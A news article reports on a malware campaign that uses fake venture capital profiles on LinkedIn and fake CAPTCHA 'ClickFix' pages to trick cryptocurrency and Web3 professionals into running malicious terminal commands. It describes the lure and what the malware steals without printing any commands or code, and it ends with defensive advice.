Fake venture capital profiles push malware through LinkedIn

Cybersecurity researchers have uncovered a coordinated malware campaign that uses fabricated venture capital identities on LinkedIn to target professionals in cryptocurrency and Web3 sectors, employing deceptive CAPTCHA prompts to trick victims into executing malicious commands on their own computers.

Security analysts say the operation combines social engineering, phishing and cross-platform malware delivery, focusing on individuals likely to be involved in blockchain startups, token projects and digital asset investment. By posing as venture capital executives seeking partnerships or investment opportunities, the attackers establish contact with potential victims before directing them to compromised websites designed to deploy malware.

Investigators examining the campaign describe a sophisticated approach that blends traditional phishing tactics with newer “ClickFix” techniques. Victims are typically approached through LinkedIn messages from accounts that appear to represent venture funds or investment firms. The attackers claim interest in funding a project or exploring collaboration, encouraging the target to review documents or a presentation hosted on an external site.

Once the victim opens the link, the site presents a fake CAPTCHA verification page. Instead of the familiar verification test used to confirm human activity, the page instructs users to perform a set of steps that appear routine but are in fact malicious. The instructions guide victims to copy and paste commands into their system’s terminal or command prompt under the pretext of completing verification. Executing those commands allows the attacker to install malware directly onto the victim’s device.

Cybersecurity specialists note that the technique relies heavily on convincing victims to run commands themselves, bypassing many traditional security protections. Because the commands are executed by the user, endpoint security tools may initially treat the activity as legitimate system behaviour.

Researchers analysing the campaign say it targets professionals involved in cryptocurrency development, blockchain infrastructure and Web3 services, groups that often interact with venture capital firms and may therefore be more receptive to investment inquiries. Attackers exploit this dynamic by creating detailed LinkedIn profiles that appear credible, including fabricated employment histories, professional photographs and connections to other accounts.

Fake venture capital firms featured in the campaign include entities that appear plausible but do not exist in financial records. Profiles linked to these fictitious funds present themselves as investment executives specialising in digital assets or blockchain technology, increasing the likelihood that Web3 entrepreneurs will engage with them.

After establishing contact, the attackers gradually move the conversation away from LinkedIn messaging to external platforms or websites. Victims may be invited to review a “pitch deck”, schedule a meeting or download project materials. The links provided in these messages lead to websites hosting the fake CAPTCHA interface and the malicious command instructions.

Cybersecurity firms examining the attack infrastructure say the malware deployed through the scheme is capable of harvesting sensitive information, including browser data, cryptocurrency wallet credentials and stored authentication tokens. Such data can allow attackers to access digital wallets, corporate systems or online accounts linked to blockchain projects.

Experts warn that the cryptocurrency and Web3 industries remain attractive targets for cybercriminals due to the high financial value associated with digital assets and the sector’s reliance on online collaboration. Professionals frequently use platforms such as LinkedIn to connect with investors and partners, creating opportunities for attackers to impersonate legitimate contacts.

Security analysts also highlight the growing use of social engineering tactics that require victims to initiate the compromise themselves. Rather than relying solely on malicious downloads or attachments, attackers increasingly employ psychological manipulation that persuades users to bypass safeguards voluntarily.

The ClickFix method represents an evolution of such tactics. By imitating CAPTCHA systems commonly used to prevent automated activity, attackers exploit a familiar security mechanism to disguise malicious instructions. Victims may believe they are completing a routine verification step, unaware that they are executing commands that compromise their system.

Researchers say the campaign operates across multiple operating systems, suggesting that attackers designed the malicious scripts to function on both Windows and macOS environments. This cross-platform capability increases the potential impact of the operation, particularly within technology-focused sectors where a range of operating systems is common.

Cybersecurity specialists urge professionals in blockchain and cryptocurrency fields to treat unsolicited investment approaches with caution, especially when communication shifts quickly from established platforms to external links or documents. Verifying the authenticity of venture capital firms and their representatives can help prevent exposure to such schemes.

LinkedIn has become a frequent target for threat actors seeking to infiltrate corporate networks or technology communities. The platform’s role as a professional networking hub allows attackers to gather information about potential targets, identify individuals working on high-value projects and craft personalised messages designed to appear credible.